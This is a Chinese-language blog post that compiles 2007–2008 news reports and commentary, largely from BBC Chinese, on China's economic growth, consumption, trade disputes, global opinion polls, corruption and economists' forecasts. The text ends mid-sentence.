[{ "title": "稀奇古怪的中国经济", "category": "", "tags": "misc1, misc2, misc3, misc4", "url": "/2026/04/02/ce.html", "date": "2026/04/02", "content": "(北京时间 2008 年 7 月 04 日 来稿) 正如俗话所说，“当中国打喷嚏时，世界其他地方就会患……” 且慢，这难道不是用来形容美国时常用的陈词滥调吗？或许就是，但对于全球经济增长来说，这些天来中国经济减速几乎同美国经济衰退一样重要。北京能够驾驭其飞速增长的经济实现软着陆吗？或者说，世界将遭受美国、欧洲和中国经济虚弱表现的三重打击吗？中国经济的全球化不仅仅使中国产品走进了世界各地的数十亿个家庭，还把世界的命运同中国的未来联系在了一起。中国的出口几乎占到了世界总出口的 9%，而中国的进口正在帮助其他的经济体维持繁荣。其中近 1 / 3 的进口来自附近的日本、韩国等。由于日本试图巩固其期待已久的经济复苏，韩国则担心其出口需求下降，因而，中国增长的急速下降可能是危险的。美国、德国以及中国其他的主要供应国也以担忧的心情注视着中国。如果急剧减速到来，它的程度会有多大？中国政府明显意识到了其经济正处于过热的危险之中，但并不情愿采取严厉的措施为经济增长刹车。人民币价值适当而稳健的增长可能有助于减少中国的贸易顺差。然而，利率不得不大幅提高。采取这种权宜之计的部分原因可能是政治上的考虑。由于中国的中央银行并没实现真正的独立，所以即使一些经济学家预测说通货膨胀率达到两位数字也不会导致更加严厉的信贷政策，尤其是在今年夏天的奥运会期间。但如果央行保持沉默，那么最近的事态可能会使形势更加恶化。过去两年来，中国一直努力使其经济年增长率从 11% 到 12% 下降到 8% 或 9%。即使这一变化也很难实现。如果通胀继续上升，增长不很快放缓，那么软着陆 —— 在不引起经济衰退的情况下使经济活动减速 —— 几乎是不可能的。到目前为止，中国的通胀部分是由国内需求推动的，部分是由全球商品价格上升推动的。不过，瑞士信贷的亚洲首席经济学家陶冬 (音) 说，工资压力可能在今年下半年把国内价格推到一个更高的水平。陶说他认为对于中国经济来说有两种假定。一是对中国出口产品需求的降低可能会引发中国经济轻微的减速，可以缓解价格压力，允许经济有一个喘息的机会；另一个假定是高通胀将导致政府采取积极行动，如提高利率和允许人民币快速升值。繁荣的中国房地产市场将遭受打击，国内消费也将受到影响，还会影响到对世界其他地方产品的需求。对全球经济来说，这将是一个重要的发展阶段。中国经济年增长率急速下滑，比如说从 12% 下降到 4% 将会使全球经济损失 2800 亿美元，几乎等同于美国经济增长率从 3% 下降到 1% 所带来的影响。即使美国经济规模仍是中国经济规模的四倍，中国经济的快速增长仍将是非常令人怀念的。（2008 年 7 月 4 日《新快报》）这是该报翻译自美国《国际先驱论坛报》的一篇文字。王未名长年累月地给我发来 BBC 和世界日报的相关报道。2007 年 01 月 02 日 格林尼治标准时间 14:11 北京时间 22:11 发表转寄朋友 打印文稿透视：“新中间阶层” 和 “有钱不敢花”透视中国江迅中国人收入高了却仍不敢消费年终，家家户户在掐指算计一年的收入。圣诞刚过，元旦来临，春节也不远了。这些日子应该是消费旺季，但不少中国百姓还是捂紧着钱袋子。中国经济全球领跑，百姓的收入不能说没有提高，但百姓还是喊穷。月收入 4700 多元人民币（下同）的北京大学新闻与传播学院副教授、中央电视台《实话实说》前主持人周忆军（阿忆），前不久在博客中也叫穷，引发网上争论热潮。阿忆月工资 1918 元，津贴 1368 元，教学补助 1333 元，其它补助 167 元，总计 4786 元。每月供房、供车，一双儿女的读书，家庭生活开支全数相加，总支出为 5285 元。言下之意，每月支出比收入要超出 499 元，因此无奈中他要去电视台主持节目、当嘉宾，以增加收入。网友们批评说：“以你的收入，在北京过个衣食无缺的日子肯定绰绰有余。当然你得将私家车卖了，改乘地铁和公交车。多看看比你收入更低、生活状况更差的干部、教师和群众，你的心理就平衡了。”其实，贫穷和富有永远是相对而言的。阿忆认为自己穷是与上比，网友要他与下比，他当然算富裕了。阿忆是中国当今典型的 “新中间阶层”。“新中间阶层”中国国情研究会刚公布了一项 “新中间阶层生活调查” 的最新调查报告。进行这次调查的负责人都来自国家统计局，因此这一调查的权威性颇高。调查于 2006 年 9 月在北京、上海、深圳等 47 个大中小城市展开，内容包括旅游、汽车、品牌、消费等 8 个方面。从这份调查的样本中，可发现中国官方所指的所谓 “新中间阶层” 的标准定义。它的定义指标是：家庭月收入方面，中小城市的受访者要求在 1500 元以上，大城市要求在 2000 元以上，结果整体受访者 70% 的收入在 4000 元以上。其它的指标是具有高学历，受过专业化训练；主要从事脑力劳动工作；以工资薪金为主要谋生来源；对社会公共事务有一定的发言权和影响力；强调 ;自我成就、自我实现，对社会意识形态有相当的影响力；拥有生活必须的体面财富和休闲时间。这与通常人们所说的 “中产” 似乎差别不大。说 “新中间阶层” 穷，其实他们也不穷；说 “新中间阶层” 富，其实他们并不算富有。不少网友认为阿忆的生活消费太高，应当减少消费。有趣的是，如何让百姓的消费更快增长，却是时下最热点的话题之一。可以说，底层百姓是中国各阶层中消费倾向最高、储蓄率最低的群体。收入是消费的基础，收入不高是制约消费的关键因素之一。底层百姓原本收入就不高，把不多的收入全部拿去消费而维持低水平的生活了，至于孩子上学、医疗看病往往都没有着落，买新楼、驾私车、外出旅游更是一种奢望。就业人员中，80% 是低收入阶层，农民年收入才 3000 元，蓝领工人才 1 万元。正如北京经济学家樊纲所说：“经济学的基本原理是，收入越高，消费倾向越低；收入越低，储蓄倾向越低。中国多数的收入增长都集中到只占 20% 高收入群体手中，因此整体消费倾向很难再提高。”手中有一组官方披露的数字：2006 年前三季，中国消费比 2005 年同期增长 13.5%，但消费对经济增长的贡献率仅为 35.7%，而投资则达 49.9%。消费冷清，而投资火热，消费这驾拉动内需的马车，呈现疲软之势。消费率偏低，必然影响经济持续稳定和健康发展。不敢花钱尽管就业人员中，八成是储蓄倾向低的低收入群体，但当今中国，却又是 40% 的高储蓄率，这透露出有一点钱的百姓不敢花钱的倾向。三个月前在安徽省黄山市采访。市民陈嘉俊早年做点小生意，积攒了十多万元，如今年龄大了，不再做小买卖了，没有了新的收入。他说：“我没有加入社会保险，孩子在南京读大学，还需要花钱，积下的钱不敢乱花，按老话说，一块钱也得掰着两半花，万一自己和老伴得个什么病，那些积蓄还能顶上。”当下，世界劳工组织确定的公共养老保障体系覆盖面的最低标准是 20%，中国百姓参与养老保障的只占总人口的 15%，参保医疗保险的人数为 1.5 亿，中国人口基数是 13 亿人，覆盖面相当低。两个月前，在广西采访。武鸣县双桥镇农民郭根义刚刚治病出医院，花了他 3000 元，一说起就感到心痛，三儿子结婚盖房，又花了他 5000 元。他说，虽然村民每年的收入有所增加，但手上的钱不经花，所剩不多，能不花就不花，小女儿在柳州上学，还需要钱，日子不说艰难，也是不好过的。2006 年前三季，中国农民现金人均收入达 2762 元，实际增长 11.4%，连续三年保持两位数增长，但人均纯收入仅是城镇居民人均可支配收入的 1 / 3。百姓捂紧钱袋子，有钱不敢花，这就是现实。要增加整体百姓消费，唯有提高 80% 低收入群体的收入，而这还是要靠经济的持续增长来解决，没有其它根治的办法。请就本文发表意见和评论新的一年，执政当局能有什么灵丹妙药呢？（江迅：BBC 中文网中国事务特约撰稿人）……………………2007 年 03 月 30 日 格林尼治标准时间 16:16 北京时间 00:16 发表转寄朋友 打印文稿美国宣布向中国纸品征收反贴补税中国造纸业设计图美国商务部长古铁雷斯周五宣布，向中国造纸企业征收惩罚性关税，以抵消中国政府的出口补贴。古铁雷斯周五对新闻界表示，商务部初步决定，对中国生产的高亮度加膜纸（又称高亮度涂布纸）征收 10.90% 到 20.35% 的反贴补税。美国的这一决定是 23 年来首次对一个美国标准下的非市场经济国家征收这种补偿关税。古铁雷斯周五在做出上述宣布的同时指出，中国经济今非昔比，现在已经到了可以对中国使用反贴补税这类贸易调节手段的时候了。司法决定此前美国国际贸易法庭拒绝了中国提出临时禁止美国政府进行贸易制裁行动的要求。该法庭周四判决，美国商务部有权向得到国家补助的中国企业实施制裁。事件的起因是美国 NewPage 公司提出申诉，声称该公司的高亮度涂布纸正面对来自中国的不公平竞争，因为中国的造纸企业得到中国政府的不公平补贴。该公司的代表律师说，这一判决是重要的胜利，这意味美国商务部将进一步跟进该案。中国官员尚未对有关判决发表评论，但中国政府可以向华盛顿的美国上诉法院提出上诉。美国从钢铁业到家具业都密切注意这起案件，近年来大量廉价的中国货品涌入美国市场，使它们的业务大受打击。美中贸易逆差去年达到破纪录的 2330 亿美元，许多议员因此向美国国会提出议案，要求商务部改变不向” 非市场经济国家” 征收反贴补税的政策。……………………2007 年 06 月 28 日 格林尼治标准时间 11:34 北京时间 19:34 发表转寄朋友 打印文稿全球民调：多数人对中国印象积极报告称世界民众对中国印象主要仍然积极。一项全球民意调查反映，虽然中国的国际形象近年有恶化趋势，但是多数受访国家民众仍然对中国抱有好感。美国华盛顿佩尤研究中心的年度《全球态度调查》报告显示，在 47 个接受调查的国家中，27 个国家的受访民众对中国抱正面态度。接受调查的国家中只有五个国家的多数民众对中国持负面态度，其中包括日本和意大利。接受调查的国家民众普遍认为中国经济发展对自己国家有利，但在部分国家，认为中国经济发展是个威胁的民众比例也在上升。此外，世界民众普遍对中国的军事扩张感到忧虑。地域区别亚洲国家普遍对中国有好感。其中马来西亚最多人（83%）对中国感觉正面、巴基斯坦有 79%、印尼有 65%。而在日本、韩国和印度三个中国主要邻国，当地民众对中国的态度则有较大的恶化。日本有 67% 民众对中国态度负面，比 2002 年增加 25%；韩国只有 52% 受访者表示喜欢中国，比 2002 年下跌了 14%；而印度只有 46% 的人对中国有好感，比 2005 年下跌了 10%。欧洲民众对中国的不满情绪也在加深，意大利、德国和法国等国都有 50% 以上受访民众表示对中国不满，其中意大利的比例更高达 61%。而在另外几个欧洲国家也可以清楚看到对中国不满人数的增加，对中国有好感的西班牙人比例下跌了 18%，英国人下跌 16%，德国人下跌 12%、法国人下跌 11%。在美洲，智利、委内瑞拉、秘鲁和加拿大民众过半数对中国抱有好感，美国欢迎和讨厌中国的受访者拉成均势，分别有 42% 和 39%。在非洲国家中，除南非和乌干达外的所有国家都有 60% 以上的民众对中国有好感，其中在科特迪瓦和马里，这一比例更高达 92%。中国解放军的不断扩张引起不少国家忧虑。发展军力针对中国近年大力发展军事力量，中国邻国的受访者明显最为担心。89% 韩国受访者和 80% 日本受访者觉得，中国军事膨胀对他们有很大影响。印度也有 59% 民众表达了相同的忧虑。美国和加拿大超过 60% 受访者认为，中国军事扩张对于他们国家来说不是好的事情。法国保持这个观点的民众更高达 84%。俄罗斯 70% 民众认为，中国军事扩张是坏消息。中东国家除了科威特外，大都对中国军事发展抱有怀疑态度。经济膨胀相对于军事发展，世界各国普遍正面看待中国的经济发展。46 个受访国家当中，25 个国家民众认为中国经济飙升对于他们国家来说是恩惠。中国对非洲投资的影响在这次调查得到充分反映，部分非洲国家对中国经济增长出现 100% 的正面回应。科特迪亚 96% 受访者认为中国发展对他们有利；肯尼亚民众 91% 抱持相同看法。亚洲国家几乎也都保持这种看法。马来西亚、孟加拉、印尼和巴基斯坦，以至于对中国扩军存有恐惧的日本和俄罗斯都是如此。只有印度和韩国民众对中国的经济发展表示担心。印度只有 42% 的民众表示认同中国经济发展，民众比两年前倒退 11%；韩国则有 60% 的人视中国经济为威胁。佩尤研究中心报告指出，中国在世界上的影响力可以跟美国匹敌，然而中国比美国更受欢迎。环境忧虑今年的调查结果也发现，对环境问题的担忧导致部分国家民众对中国印象变差。调查发现，环境问题已经成为世界上人民普遍担忧的问题之一，这在拉丁美洲、欧洲、日本和印度尤其明显。报告指出，多数人认为美国和中国应对世界现存的环境问题负责，虽然人们都承认到中国的责任比美国小得多。各国受访者普遍认为虽然美国对环境问题责任最大，但中国的责任仅次于美国。而 56% 的韩国人认为中国对世界环境问题应负最大的责任；日本、德国和英国等国家持此意见的人也均超过 30%。这份调查在全球 46 个国家以及巴勒斯坦地区共访问了 4.5 万人。取样误差率在 2 到 4 个百分点之间。……………………2007 年 09 月 04 日 格林尼治标准时间 05:40 北京时间 13:40 发表转寄朋友 打印文稿“中国应靠内需结束依赖西方市场”报告认为中国持续依赖出口将增加经济受损风险。世界经济论坛指出，发展国内市场有助于减低受海外消费习惯改变可能给中国经济带来的冲击。论坛发表关于全球增长所面对风险的报告指出，中国经济增长将是未来十年全球经济和政界” 新领军者” 最关心的问题之一。这份报告的发表正值世界经济论坛将在星期四（9 月 6 日）在中国大连召开该组织首届新领军者年会前夕。中国总理温家宝等超过 1700 名中外代表将出席这个被誉为” 夏季达沃斯” 的经济论坛。报告指出，目前全球经济仍对美国有很大程度的依赖。美国自 1998 年起每年有 3.5% 的消费增长，但报告指出，美国的消费是建基于借贷之上。美国消费增长缓慢，加上近期次级房贷危机，使观察家们对依赖单一消费市场产生恐惧。报告说，中国凭借充裕的廉价劳工多年来一直为美国等西方国家制造出口商品，对美国和欧盟市场的依赖意味着中国经济很可能受到这两个市场的变化而陷入危机。中国工业” 转折点”世界经济论坛报告指出，中国制造业由于内部竞争加剧，工资水平上涨以及利润收缩等问题，目前正面临” 转折点”。中国企业极少宣布破产以及中国市场欠缺保护知识产权意识等结构性问题，更使问题雪上加霜。然而，在中国零售业每年 13% 的增长下，投资者正把焦点转移到这亚洲巨人身上。报告说，这些投资者希望在中国寻找买家，而不再单纯寻找廉价劳工。这为中国工业带来了新转机。报告还指出，外国投资者已经开始在中国发展设计业务，并发现中国的产品设计能力卓越，能够从中国出口设计到别的地方投产。不过世界经济论坛警告，仍然存在的问题是，中国内需增长能不能有足够的增长，来弥补出口市场衰退的影响。此外论坛也指出，中国还需要改善司法人员贪污与问责等问题，而更加开放的媒体将有助于建立政治透明度。……………………2007 年 10 月 08 日 格林尼治标准时间 12:44 北京时间 20:44 发表转寄朋友 打印文稿中国威胁论中国听友中国威胁论在欧美国家已经流行了一段时间近二十年来，中国的经济得到迅速发展，国民经济总量提升很快，名列世界几大经济实体之列，全世界到处都是” 中国制造” 的产品。本来，一个经济正在高速发展的国家，应该给世界带来的是正面的影响。中国又没有对外发动战争，但为什么在世界特别是西方国家中会出现” 中国威胁论”，且有日渐发展之势呢？对这个问题，如果不加思索，很多中国人会想不通。究其原因，可以有很多种。例如人口庞大、经济发展带来的环境恶化、还有最近中国出口产品发生的问题等等。但我觉得，其中最重要的原因，是迅速增长的中国经济实力与专制政体相结合这样一种国家模式给世界带来的恐惧。前不久，中央电视台播出的政论片《大国崛起》，虽然在论述九个经济大国的历史时，对经济发展与政治体制的关系含糊其辞，但还是向中国人展现了这么一段历史：当年经济迅猛发展的德国和日本，由于其专制政体，最终对外挑起了战争，给全世界带来巨大灾难。专制政治其中一个特点，是可以较轻易地集中一个国家的财力、人力，甚至以高压手段统一全体人民的思想，去做统治者想做的事情。” 中国威胁论” 的出现，正是有这么一种历史和现实的渊源。对” 中国威胁论”，如果简单冠以” 反华”、” 敌视中国” 是无济于事的。前些日子，中国经济学家茅于縫接受英国 bbc 采访时指出，二十年多来中国财富的增长是史无前例的，而中国的腐败、权力不受制约同样也是史无前例的。我认为，这种情况如果继续发展下去的话，将不仅给中国人民带来灾难，也会给世界带来灾难。要想让” 中国威胁论” 消声匿迹，唯一出路是，当局放弃一党独裁的专制政体，在经济发展的同时实现政治文明，这不仅是中国人民的大幸，也是世界人民的大幸。……………………2007 年 10 月 11 日 格林尼治标准时间 10:31 北京时间 18:31 发表转寄朋友 打印文稿中国腐败侵吞资金超过教育经费今年九月，中国成立了专职预防腐败局中国官员侵吞的资金已经超过教育经费，腐败问题已经严重到威胁中国政治稳定的程度。据美国卡内基国际和平基金会的报告说，解决腐败问题就必须进行政治改革，但中共因为担心失去权力而拒绝政治改革。这份报告的作者是卡内基基金会资深研究员裴敏欣。他说, 中国的公共开支中 10% 被回扣、贿赂甚至盗窃所侵吞。在 2003 年，腐败所侵吞资金达 860 亿美元，达当年国民生产总值的百分之三。这个数字已经超过了 2006 年中国政府的教育经费总合。报告说，虽然存在着严重的腐败问题，但中国经济依然在增长，社会也没有发生大的动乱，西方投资者的热情不减。缺乏政改意愿但是这一切并不意味着目前的中国政治体制可以无限度地消化日益严重的腐败所带来的日益严重的后果。裴敏欣表示，腐败日益严重的原因是历经多年经济改革之后，政府依然广泛干涉经济事务，执法缺乏力度，以及共产党缺乏政治改革的意愿。报告说，腐败已经成为中国政府最棘手的一个严重问题，因为解决腐败必须进行政治改革，但中共担心进行政改会损害自己的执政党地位。近年来，中共高层官员不断传出腐败丑闻。原中共上海市委书记陈良宇也因挪用社保基金案下台。原中国药检局局长郑晓萸也因贪污被执行死刑。……………………2007 年 10 月 17 日 格林尼治标准时间 17:50 北京时间 01:50 发表转寄朋友 打印文稿欧盟贸易专员：欧中贸易不平等曼德尔森：欧盟与中国的贸易关系 “深深地不平等”欧盟贸易专员曼德尔森表示，欧盟与中国的贸易关系 “极大地不平等”。在 BBC 获悉的一封致欧盟委员会的信件中，曼德尔森坦率地指出，中国把与欧盟的这种贸易关系看作是理所当然。中国目前是欧盟最大的制造业产品来源地。但是，曼德尔森表示，贸易壁垒和中方的干预限制了欧盟向中国出口产品，这使欧盟公司损失惨重，达数十亿英镑。曼德尔森在致函欧盟委员会主席巴罗佐的信中说，在有关的对话渠道设立之后，中国则 “在程序上设置障碍”。“公众压力”曼德尔森说，欧盟向瑞士出口的产品超过了向中国出口的产品，此外，欧盟与中国的贸易赤字正以每小时 1,000 万英镑的速度增加。这位欧盟贸易专员补充说，“从某种程度上说，中方的作法已失控了。”见过这封信函内容的 BBC 记者戴蒙德说，欧盟贸易专员的信件 “实际上谴责中方姿态傲慢。”BBC 记者戴蒙德说，函件的信息看起来很明确，那就是欧洲彷徨得够久了。曼德尔森对 BBC 表示，“如果我们要在政治上维持对中国的开放政策，我们得确保双方的贸易关系是完全和公平的，而且公众对此感到满意，否则我们就会有麻烦了。”他表示，中国 “在经济和外交层面变化如此之快，政策决策者几乎不太可能及时跟进，更不要说走在决策的前面了”。曼德尔森指出，“由于中国经济的高速增长，加上其政治和外交的触及范围，以及对全球安全带来的影响，所有这些令我们看到中国正在很多不同方面改变着全球景观”。……………………2007 年 11 月 06 日 格林尼治标准时间 07:34 北京时间 15:34 发表转寄朋友 打印文稿温家宝否认政府宏观调控不力中国经济过热引发许多问题中国国务院总理温家宝否认政府宏观调控不力，并且强调不能够简单地解决经济发展中的问题。正在莫斯科访问的温家宝专门接受了香港媒体的访问。他表示，留意到有香港传媒批评中国政府宏观调控不力，他希望借着这个机会解释这个问题。他说：” 这五年以来中国的经济发展比较好。如果说经济发展的好，而宏观调控不力，这既不符合事实，也不符合逻辑。”温家宝又指出，作为主管 13 亿人民生活和建设的政府，应该从全局以及从整体人民的利益着眼，也应该对人民负责。经济增长他说：” 在这问题上我是怀着赤诚的心，而且还要继续进行下去。”温家宝还表示，看到经济发展中存在的问题，其中有长期积累的，也有个方面的因素，不能够简单地解决。他强调，今后一段时间会保持经济一定的增长，才能有足够的财力解决民生问题。另一方面，中国官方新华社周一（5 日）引述北京师范大学金融研究中心学者钟伟称，总体而言，目前中国宏观经济运行过热，但趋势已基本得到控制。文章认为，资产价格的快速膨胀对中国经济的稳定增长构成最大威胁，需要在利率、汇率方面作出更大调整。钟伟表示，当前资产价格膨胀给中国宏观调控带来两方面的挑战。一是用本外币价格观察资产价格膨胀，可能得出截然不同的趋势判断；二是宏观调控是否应当关注资产价格的变动，并对资产价格进行适当调控。……………………2008 年 01 月 09 日 格林尼治标准时间 03:51 北京时间 11:51 发表转寄朋友 打印文稿“中国缓冲世界经济放缓”中国经济快速发展带动世界经济世界银行最新报告提出，中国经济的持续发展将有效缓冲由美国次按危机造成的世界经济放缓。世界银行《2008 年世界经济前景》报告预言，2008 年世界经济增长率将约为 3.3%。美国次按危机波及全球，其他发达国家受影响尤其严重，2007 年世界经济增长率因此从 2006 年的 3.9% 减缓至 3.6%。美国经济增长率在 2007 年由 2006 年的 2.9% 减缓到 2.2%，世界银行预计 2008 年美国经济增长将只有 1.9%，但相信 2009 年将再度上升至 2.3%。报告指出，发展中国家经济，特别是中国经济的持续快速发展，可以有效地缓解发达国家经济所出现的问题。世界银行相信中国未来两年的经济增长率都仍将超过 10%，但提醒中国仍要警惕经济过热。同时印度经济发展也相当迅速，只略比中国逊色。发展中国家世界银行预言 2008 年发展中国家总体经济增长将达到 7.1%，但如果刨除中国和印度，则这个数据则只有 5.5%，中印经济对世界经济影响可见一斑。不过虽然世界银行认为美国经济 2009 年将出现复苏，但仍然提醒发展中国家警惕美国经济可能进一步恶化。报告认为如果美国经济持续减缓，则至今尚未受到次按危机太大影响的发展中国家经济也会成为这场经济危机的受害者。报告指出，1990-2005 年的 15 年中，发展中国家和发达国家之间的技术鸿沟明显减小，但中等收入发展中国家在技术方面目前仍然只有发达国家一半的水平，低收入发展中国家的水平更只有四分之一。报告认为，发达国家如果进一步向发展中国家转让技术，发展中国家在未来 10 年中还可能实现人均 3.9% 的经济增长。报告说，技术转让让世界贫困人口（日收入少于 1 美元）数从 1990 年的 12 亿降低至 2004 年的 9.7 亿，相信进一步技术转让会让贫困人口数载 2015 年减至 6.24 亿。BBC 的报道——————-2008 年 02 月 15 日 格林尼治标准时间 07:28 北京时间 15:28 发表转寄朋友 打印文稿IMF：今年中国经济增长率约 10%斯特劳斯 - 卡恩对中国经济增长有信心国际货币基金组织（IMF）总裁斯特劳斯 - 卡恩预言，虽然世界经济增长今年可能减缓，但中国今年经济增长率仍将维持在 10% 左右。正在北京进行访问的斯特劳斯 - 卡恩同时呼吁中国政府加快人民币升值的速度，同时在经济发展方面更多依赖国内需求而不是出口增长。斯特劳斯 - 卡恩表示，灵活的人民币兑换率政策符合中国自身的经济利益，“既可以解决中国所面临的经济挑战，也可以对环球经济稳定作出贡献”。这是斯特劳斯 - 卡恩去年 11 月就任国际货币基金组织总裁以来首次访问中国，他分别会晤了中国国家总理温家宝和中国人民银行行长周小川。据斯特劳斯 - 卡恩透露，他与温家宝和周小川谈话的中心议题就是世界经济增长减缓的可能影响。他认为没有任何国家会对世界经济衰弱具有免疫力，但他仍相信中国经济增长率 2008 年还会增长 10%。他特别提到，在发达国家经济减缓的情况下，中国经济的强劲增长具有前所未有的重要意义。路透社报道指出，国际货币基金组织在去年 6 月出台《对成员国政策双边监督的决定》后，中国与该机构关系处于紧张状态。中国认为这是美国利用国际货币基金组织迫使中国放开对人民币兑换率控制的手段。……………………2008 年 02 月 15 日 格林尼治标准时间 10:54 北京时间 18:54 发表转寄朋友 打印文稿中国对外贸易顺差继续大幅增长中国贸易顺差增长依然强劲中国一月份贸易顺差比去年同期增加了 22.6%，达到 195 亿美元。据新华社公布的数字，这个增长幅度和去年全年 47.7% 的增长幅度相比下降了一半以上。但是许多经济学家认为，这仍然显示出，中国的贸易顺差额过于庞大。英国剑桥大学经济学家张炜在接受 BBC 中文部电话采访时就表达了这样的看法。采访录音他说：” 这个增长速度相对于中国当前的情况来讲，是一个非常高的增长速度，尤其是考虑到这个增长速度是在去年一个非常超高的增长速度下取得的，也是在中国经济结构已经过度依赖对外出口这样扭曲的情况下取得的。”“这说明中国的经济结构不仅没有得到优化，而且仍然还在朝着恶化趋势发展。这一点还是非常值得警惕的。”……………………2008 年 02 月 22 日 格林尼治标准时间 03:22 北京时间 11:22 发表转寄朋友 打印文稿民调：美国人相信中国才是经济巨头中国经济发展之迅速让世界刮目相看美国最新民意调查发现，四成美国人相信中国已经取代美国，成为世界经济巨头。美国盖洛普咨询公司最新发布的年度国际事务调查指出，每 10 名美国人就有 4 人认为中国是世界第一经济强国，只有 33% 受访者仍然认为美国才是第一。但是在 2002 年 5 月的同类型调查中，65% 受访美国民众认为美国是世界经济强国。当时超过 50% 受访者有信心美国在未来 20 年还能保持领导地位。盖洛普指出，凭着自 1978 年以来每年平均 9.6% 的国内生产总值上涨，中国经济增长之快速似乎难以被超越。民调其实反映了部分美国民众的印象误区 —— 根据 2006 年的世界银行排名，美国以本地生产总值计算仍然是全球经济输出最高的国家，其次是日本。中国排名第 6，仍落后于美国、德国和日本。这项调查在今年 2 月 11 至 14 日期间进行，一共访问了 1007 名美国成年人。数据误差是正负 3 个百分点。……………………2008 年 03 月 07 日 格林尼治标准时间 07:28 北京时间 15:28 发表转寄朋友打印文稿林毅夫：中国经济可再急涨 30 年林毅夫相信中国经济还能长期快速增长刚获任命为世界银行副行长兼首席经济师不久的林毅夫说，中国快速的经济增长还将持续 30 年。身兼中国全国人大代表的林毅夫星期五（3 月 7 日）接受媒体采访时说，中国的工业还有很大的发展空间，而且还有庞大的国内市场。他说，来自国外的投资者，无论视中国为他们的生产基地，还是一个不断增长的庞大市场，都将继续到中国投资。林毅夫在北京与同是全国人大代表的夫人陈云英一同会见媒体记者。将近 30 年前从金门逃往中国大陆的林毅夫对 2002 年父亲去世时不能回台奔丧表示 “难以面对”，并希望能回台湾给父亲扫墓。林毅夫语带感触地说：“这是我很难面对的问题…… 清明节快到了，确实有这个愿望”次按风暴影响有限对于当前让世界各地感到困扰的美国次级房贷问题，林毅夫说，涉及这问题的中国机构不多，而且中国出口到美国的主要是低价产品，因此相信中国不会受到信贷危机的太大影响。林毅夫认同中国实施从紧的货币政策。他主张利用利率手段来处理通胀问题。林毅夫说：“因为提高存款准备金率会排挤中小企业的信贷需求；不提高利率，会把钱赶进股市和楼市，造成资产价格膨胀。”他说，由于中国资本账户还没有完全开放，尽管人民币利率高于美元，交易成本还是高，博取利差的动力不足。因此中国可以更大胆的运用利率工具，而不用担心热钱流入。林毅夫还认为，说中国出现全民炒股的现象时夸张的说法，因为上海和深圳两地目前共有一亿户登记股民，排除重叠户口，实际上不足一亿人。不过他劝告一般投资者作短线投资时要有心理准备。林毅夫 1979 年担任台湾军队金门马山连连长时游泳逃亡中国大陆，至今仍是台湾的军方通缉犯。2002 年他的父亲去世时，也无法回台湾奔丧。对于即将举行的台湾总统选举，林毅夫说，相信台湾乡亲能选择一个为台湾带来幸福、促进两岸更加和平的总统。……………………中国经济林毅夫说未来林毅夫【中新社】【本文摘自哈佛商业评论繁体中文版 5 月号】要了解中国的未来，首先要了解中国的过去。尤其是过去的 20 多年的中国经验。1999 年以后，国外一些经济学界和媒体对于中国经济的高增长数字出现质疑声浪，怀疑中国的经济增长速度可能是虚假的。他们提出质疑很重要的原因是中国在 1998 年以后，出现两个新的经济现象，而这两个经济现象是发达国家在经济快速增长时从未遇到过的。这两个新的经济现象是什么？一个是在经济高增长的同时，伴随通货紧缩；一个是在经济高增长的同时，能源消耗反而下降。我个人的看法是：中国的经济很不容易解读，而国外的怀疑，实际上是用国外现有的理论模式套用在中国所造成的。目前中国是一个在转型中的经济，正处于由计画经济走向市场经济的转型过程，因此国外很多现有的经济模型并不适用中国。过去中国是短缺经济，很多东西买不到，只要生产出来就有人买，因而在 1980 年代，中国经济有个很特殊的现象叫做乡镇企业。乡镇企业是农民投资的，投入不高，技术水平低，产品质量也不高，但产品都卖得出去，在当时是农村致富的最主要手段。到了 1990 年代中后期，经过投资的高速增长，新增加许多生产力，造成生产能力过剩。其中相当的部分是外资企业和民营企业，通常他们技术水平都比较高，产品质量也高。在过剩的状况下，有些质量差、技术低的企业必须退出生产，由此形成经济增长内在结构的变化，能源的使用相应减少。人们更关心的是，在未来 10 年 20 年，中国经济的增长将会是什么样？我认为，中国经济发展的态势完全有可能大体上保持过去 25 年的成长速度，即每年约 8％左右的速度。当然会有所起伏，但是总体上来讲，保持 8％～10％的速度是完全可能的。研究一个国家的长期经济增长，最重要看的是三个方面：第一是这个国家要素增加的速度的可能性是多少。要素当中，土地是不会增加的，劳动力增加受人口制约，重要的是资本的积累速度可能会怎样；第二是产业结构调整的可能性。同样的要素用来生产从附加值比较低的产品转移到附加值比较高的产品的时候，即使各种要素不增加，经济也增长；第三是技术。同样的产业，技术水平提高了，经济也能发展。在上述三个方面中，技术最重要。中国从 1978 年后开放经济，开始从国外引进新技术，所以中国取得了较快的经济发展速度。由此引发的另一个重要问题是，中国走技术变迁的经济发展道路尽管是对的，但这条道路还能走多远呢？我个人觉得日本的经验是很可以作为比较的。中国现在的经济跟日本 1960 年前后的那段时间相接近。日本从 1960 年开始同样的高速增长，而且维持了将近 30 年的增长。由日本的经验来看，加上人民币长期的币值变化，到 2030 年，中国的人均收入达到美国的一半不是不可能的。如果到时达到一半，中国人口是美国的五倍，中国的整体经济规模将是美国的 2.5 倍！这个市场当然会是全世界最大的市场，这个市场也是所有投资者所希望参与的市场。（作者是北京大学中国经济研究中心主任，本文摘自哈佛商业评论繁体中文版 5 月号）2008-05-02……………………2008 年 05 月 11 日 格林尼治标准时间 14:35 北京时间 22:35 发表转寄朋友 打印文稿林毅夫：奥运后中国无经济萧条新任世界银行副行长林毅夫 (7/3/2008)林毅夫相信中国经济奥运后不会出现萧条候任世界银行副行长林毅夫说，由于整体经济规模庞大，北京奥运会后，中国不会出现经济萧条。林毅夫周日（5 月 11 日）出席由中国国际关系学会主办的 2008 东亚投资论坛时说，与奥运相关的投资在中国的经济规模中所占比重非常小。奥运经济他说，奥运会后，中国在未来几年还有许多重大国际活动要举办。例如，2010 年的上海世博会、广州亚运会，都需要大量的基础设施投资。另外，其它方面的基础设施投资空间也非常巨大。例如，到 2012 年时，北京地铁里程将增至 274 公里，到 2015 年更增至 561 公里，这些需要大量的投资。在谈到美国 经济时林毅夫表示，虽然美国次按危机不至于导致出现类似 1929 年的经济大萧条，但无论怎样，未来一两年内美国经济出现下滑和疲软是无法避免的。在谈及美国如何应对泡沫经济破灭时，他说，2001 年股票市场的泡沫破灭，美联储就用减息的方式来刺激房地产市场，由于美国普通民众的 70% 